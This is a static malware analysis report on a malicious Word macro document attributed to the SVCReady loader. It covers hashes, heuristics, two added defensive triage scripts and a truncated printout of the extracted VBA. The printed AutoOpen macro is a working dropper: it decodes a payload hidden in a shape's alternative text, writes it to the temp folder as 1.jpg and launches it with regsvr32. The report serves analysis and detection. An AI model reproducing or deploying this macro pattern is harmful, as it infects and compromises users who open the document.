Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5352a82584dd199a…

MALICIOUS

Office (OOXML)

Size: 117.1 KB
Created: 2020-07-23 12:37:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-09-07
MD5: 44e7937368ec55b7826d49f29821798f
SHA-1: 8236931b18d0a30e4ab8636370b6ea41a8602c31
SHA-256: 5352a82584dd199a0c02c76f5a03a1ab30008956fc4f85c030826f93abeb9963
Risk score: 210

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious OOXML (Word) document carrying a VBA project with an AutoOpen entry point. The macro is a dropper rather than a downloader: it reads an obfuscated payload from the alternative text of the first shape in the document (ActiveDocument.Shapes(1).AlternativeText), keeps every third character of it (c891bee4), passes the result through a method of the class module dcb13349 whose source is cut off in the preview, converts it with StrConv(..., 64) (vbUnicode) and writes it with Print # to Environ("tmp") & "\1.jpg". Environ("tmp") returns the user's %TMP%, so in a normal interactive session the drop path is %TMP%\1.jpg under the user's AppData\Local\Temp directory, not C:\Windows\Temp. The macro then calls WScript.Shell.exec with a command whose verb is hidden in the literal "rd0e1egf9s9bv31rc738b202"; the same every-third-character decode yields regsvr32, so the dropped file is presumably a DLL carrying a .jpg extension that regsvr32 loads and whose DllRegisterServer it calls (ATT&CK T1218.010, System Binary Proxy Execution: Regsvr32). No network download occurs in the visible macro; the ClamAV signature name attributes the sample to the SVCReady loader family. The many ActiveWindow/ActiveDocument property reads, string constants and arithmetic functions are junk code inserted to defeat static signatures.
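To make the decoding steps above reproducible, here is an added triage script written for this report; it is neither the scanner's code nor part of the sample. It runs over a constructed excerpt of the macros.bas preview (the AutoOpen entry point and the helpers it calls), locates the every-Nth-character decoder by its shape rather than by its randomised name, decodes the literal passed to it, and resolves Environ("tmp") against an assumed per-user temp directory (C:\Users\victim\AppData\Local\Temp is a placeholder). The payload blob itself lives in the shape's AlternativeText, which the report does not show, so only the command verb and drop path are recovered here.

```python
import re

# Constructed excerpt of the macro source shown in the report's macros.bas
# preview (the AutoOpen entry point plus the helpers it calls). It is pasted
# here so the script runs offline; point it at the full extract in practice.
MACRO_EXCERPT = r'''
Sub AutoOpen()
Dim d3f0c64c As New dcb13349
aaa = c891bee4(d13fa101)
b196ad7f = d3f0c64c.d2c1fced(aaa, "")
ae610e55 eb6f8b4e, b196ad7f
Dim b034ccb1 As New WshShell
Call b034ccb1.exec(ecde239a & " " & eb6f8b4e)
End Sub
Function eb6f8b4e()
eb6f8b4e = Environ("tmp") & "\1.jpg"
End Function
Function c891bee4(da260a86)
For a950a1bb = 1 To Len(da260a86) Step 3
cbf611e4 = cbf611e4 & Mid(da260a86, a950a1bb, 1)
Next
c891bee4 = cbf611e4
End Function
Function ecde239a()
ecde239a = c891bee4("rd0e1egf9s9bv31rc738b202")
End Function
'''

# Matches a function of the shape used by c891bee4, independent of its name:
#   Function NAME(ARG)
#   For i = 1 To Len(ARG) Step N
#   ... Mid(ARG, i, 1)
# Groups: 1 = NAME, 2 = ARG, 3 = loop variable, 4 = stride N.
STRIDE_DECODER = re.compile(
    r'Function\s+(\w+)\s*\(\s*(\w+)\s*\)\s*\n'
    r'\s*For\s+(\w+)\s*=\s*1\s+To\s+Len\(\2\)\s+Step\s+(\d+)\s*\n'
    r'[^\n]*Mid\(\2\s*,\s*\3\s*,\s*1\)',
    re.M)


def find_stride_decoder(src):
    """Return (function_name, stride) for the every-Nth-character decoder, or None."""
    m = STRIDE_DECODER.search(src)
    return (m.group(1), int(m.group(4))) if m else None


def stride_decode(blob, stride):
    """VBA `For i = 1 To Len(s) Step N` with Mid(s, i, 1) keeps 1-based
    positions 1, 1+N, 1+2N, ..., which is blob[::N] in 0-based Python."""
    return blob[::stride]


def decode_literals(src):
    """Decode every string literal passed directly to the stride decoder."""
    found = find_stride_decoder(src)
    if not found:
        return {}
    name, stride = found
    lits = re.findall(re.escape(name) + r'\(\s*"([^"]*)"\s*\)', src)
    return {lit: stride_decode(lit, stride) for lit in lits}


def resolve_drop_path(src, tmp_dir):
    """Resolve Environ("tmp") & "<suffix>" against a given %TMP% value.
    Environ("tmp") reads the *user's* TMP variable, so in a normal session
    tmp_dir is the per-user temp directory under AppData, not C:\\Windows\\Temp."""
    m = re.search(r'Environ\(\s*"tmp"\s*\)\s*&\s*"([^"]*)"', src, re.I)
    return tmp_dir + m.group(1) if m else None


def reconstruct_command(src, tmp_dir=r'C:\Users\victim\AppData\Local\Temp'):
    """Rebuild the WshShell.exec command line: decoded verb + resolved drop path.
    The user name 'victim' is an assumed placeholder."""
    verbs = list(decode_literals(src).values())
    path = resolve_drop_path(src, tmp_dir)
    if not verbs or path is None:
        return None
    return f'{verbs[0]} {path}'


if __name__ == '__main__':
    print(find_stride_decoder(MACRO_EXCERPT))
    print(decode_literals(MACRO_EXCERPT))
    print(reconstruct_command(MACRO_EXCERPT))
```

Matching the decoder by its loop shape rather than by name is deliberate: the helper names are regenerated per build, but the Len/Step/Mid idiom survives, so the same script works on sibling samples from the same builder.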

Heuristics 7

  • ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Caveat: every URL below is an XML namespace URI (an xmlns declaration in word/document.xml) that Word never fetches; they are schema identifiers, not network indicators. The only genuine external target in this sample is the file:/// relationship reported under OOXML_EXTERNAL_REL above.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (OOXML external relationship)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (OOXML external relationship)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (OOXML external relationship)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (OOXML external relationship)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (OOXML external relationship)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2006/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (OOXML external relationship)
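The OOXML-level findings above (OOXML_VBA, OOXML_EXTERNAL_REL and the namespace-URI noise under EMBEDDED_URL) can be reproduced without parsing any macro source. The following is an added example written for this report, not the scanner's code: it builds a constructed minimal .docm in memory that mirrors the sample's structure (a vbaProject.bin stub containing only the OLE header, one external file:/// image relationship copied from the report, and namespace declarations in document.xml) and triages it from [Content_Types].xml and the .rels parts alone. The part names, relationship IDs and stub contents are assumptions; the file:/// target is the one the report lists.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = 'http://schemas.openxmlformats.org/package/2006/relationships'
MACRO_MAIN_CT = 'application/vnd.ms-word.document.macroEnabled.main+xml'
OLE_MAGIC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'   # compound-file header signature


def build_sample_docx():
    """Constructed minimal .docm container (not the analysed sample) that
    mirrors the report: a vbaProject.bin part, one external file:// target
    and a document.xml that declares several namespace URIs."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
        '<Override PartName="/word/document.xml" ContentType="' + MACRO_MAIN_CT + '"/>'
        '</Types>')
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="' + REL_NS + '">'
        '<Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"'
        ' Target="file:///C:\\Framework\\rels\\builds\\pack1\\us.jpg" TargetMode="External"/>'
        '<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        '</Relationships>')
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
        ' xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas"'
        ' xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"'
        ' mc:Ignorable="wpc"><w:body/></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('[Content_Types].xml', content_types)
        z.writestr('word/document.xml', document)
        z.writestr('word/_rels/document.xml.rels', rels)
        z.writestr('word/styles.xml', '<?xml version="1.0"?><styles/>')
        # Stub VBA project: OLE header only, padded to one 512-byte sector.
        z.writestr('word/vbaProject.bin', OLE_MAGIC + b'\x00' * 504)
    return buf.getvalue()


def triage(docx_bytes):
    """Return the container-level indicators the report flags: macro-enabled
    main part, VBA project parts (and whether they are OLE files), every
    relationship with TargetMode="External" and its URI scheme, plus a count
    of xmlns URIs so URL-extractor noise can be recognised for what it is."""
    out = {'macro_enabled': False, 'vba_parts': [], 'external': [], 'namespace_uris': 0}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        ct = z.read('[Content_Types].xml').decode('utf-8', 'replace')
        out['macro_enabled'] = MACRO_MAIN_CT in ct
        for name in z.namelist():
            if name.lower().endswith('vbaproject.bin'):
                out['vba_parts'].append((name, z.read(name).startswith(OLE_MAGIC)))
            elif name.endswith('.rels'):
                root = ET.fromstring(z.read(name))
                for rel in root.iter('{%s}Relationship' % REL_NS):
                    if rel.get('TargetMode') != 'External':
                        continue   # internal part reference, never a network or file target
                    target = rel.get('Target', '')
                    scheme = target.split(':', 1)[0].lower() if ':' in target else ''
                    out['external'].append({
                        'part': name,
                        'id': rel.get('Id'),
                        'type': rel.get('Type', '').rsplit('/', 1)[-1],
                        'target': target,
                        'scheme': scheme,
                    })
            elif name.startswith('word/') and name.endswith('.xml'):
                # xmlns declarations are schema identifiers, not fetched resources.
                text = z.read(name).decode('utf-8', 'replace')
                out['namespace_uris'] += len(re.findall(r'xmlns(?::\w+)?="http[^"]+"', text))
    return out


if __name__ == '__main__':
    print(triage(build_sample_docx()))
```

Only relationships with TargetMode="External" are reported, which is what separates the single file:/// image target from the hundreds of internal part references and namespace URIs a naive URL grep returns; a file:// or http(s):// scheme on an image or oleObject relationship is the pattern worth escalating.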

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4792 bytes
SHA-256: 61d97b569a1407a24a19304cbbc32be8bc1fbcd1dfa7208a9ed6558836bfe3c2
Preview (first 1,000 lines of the extracted script; the listing below is cut off before the end):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bbc79467"
Function a016c332()
a016c332 = ActiveWindow.DisplayLeftScrollBar
End Function
Function ca09aeed()
ca09aeed = ActiveWindow.Left
End Function
Function bbae29b5()
bbae29b5 = 10744.411065918
End Function
Function cbc4d8e4()
cbc4d8e4 = Application.ActiveDocument.AttachedTemplate
End Function
Sub AutoOpen()
Dim d3f0c64c As New dcb13349
aaa = c891bee4(d13fa101)
b196ad7f = d3f0c64c.d2c1fced(aaa, "")
ae610e55 eb6f8b4e, b196ad7f
Dim b034ccb1 As New WshShell
Call b034ccb1.exec(ecde239a & " " & eb6f8b4e)
End Sub

Attribute VB_Name = "f9f3fb37"
Function db0feade()
db0feade = ActiveWindow.HorizontalPercentScrolled
End Function
Function b31ce60b()
b31ce60b = ActiveWindow.StyleAreaWidth
End Function
Function d8cd4856()
d8cd4856 = 17508 / 6
End Function
Function d0d048c9()
d0d048c9 = ActiveWindow.HorizontalPercentScrolled
End Function
Sub ae610e55(f0a0a2c3, cf1076eb)
Dim dc2058c8
dc2058c8 = FreeFile
Open f0a0a2c3 For Output As #dc2058c8
Print #dc2058c8, b3062764(cf1076eb)
Close #dc2058c8
End Sub
Function eb6f8b4e()
eb6f8b4e = Environ("tmp") & "\1.jpg"
End Function
Function a21a5d01()
a21a5d01 = ActiveWindow.VerticalPercentScrolled
End Function
Function f65e87ab()
f65e87ab = "Misplace gondolas delegation windowless dilemma"
End Function
Function f6d6392f()
f6d6392f = 41114.073787526
End Function
Function d58d4d56(bdf5b14cnp As String) As Boolean
If 509 > Len(bdf5b14cnp) Then
d58d4d56 = False
End If
End Function
Function c891bee4(da260a86)
For a950a1bb = 1 To Len(da260a86) Step 3
cbf611e4 = cbf611e4 & Mid(da260a86, a950a1bb, 1)
Next
c891bee4 = cbf611e4
End Function
Function a36723a7()
a36723a7 = "ajHLBqi"
End Function
Function c04c394e()
c04c394e = ActiveWindow.DisplayVerticalRuler
End Function
Function c47655c4()
c47655c4 = ActiveWindow.SplitVertical
End Function
Function a6c5678b()
a6c5678b = 1453294464 / 28736
End Function
Sub ba4b90ba()
End Sub
Function b19494bc()
b19494bc = 56
End Function
Function c3893206()
c3893206 = ActiveWindow.View
End Function
Function d56315d1()
d56315d1 = ActiveWindow.Height
End Function
Function c3d2ac9a()
c3d2ac9a = ActiveWindow.Index
End Function
Function b3062764(cf1076eb)
b3062764 = StrConv(cf1076eb, 64)
End Function
Function a8c38f44()
a8c38f44 = ActiveWindow.DisplayLeftScrollBar
End Function
Function dcf62b5f()
dcf62b5f = ActiveWindow.HorizontalPercentScrolled
End Function
Function c153b519()
c153b519 = ActiveWindow.Height
End Function
Function f220613f()
f220613f = ActiveWindow.Top
End Function
Function d13fa101()
d13fa101 = ActiveDocument.Shapes(1).AlternativeText
End Function
Function a304ddd3()
a304ddd3 = Application.ActiveDocument.CompatibilityMode
End Function
Function c932ae8a()
c932ae8a = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function bdc742e7()
bdc742e7 = ActiveWindow.HorizontalPercentScrolled
End Function
Function cb793ea6()
cb793ea6 = "Indices enshrine agog happenings"
End Function
Function ecde239a()
ecde239a = c891bee4("rd0e1egf9s9bv31rc738b202")
End Function

Attribute VB_Name = "dcb13349"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function a98983b0() As Long
Dim a224b4f2 As Long
Dim adbc91f9 As Integer
adbc91f9 = 7
For a224b4f2 = 11 To 60
adbc91f9 = adbc91f9 - a224b4f2
Next a224b4f2
a98983b0 = adbc91f9
End Function
Function f198f26f()
f198f26f = Application.ActiveDocument.Application
End Function
Function ed7034a3()
ed7034a3 = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Funct
... (truncated)
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 28672 bytes
SHA-256: 51aea962db7cedd73774824382e1eb4c141c4b29102b5b4d23793fc4bb957a61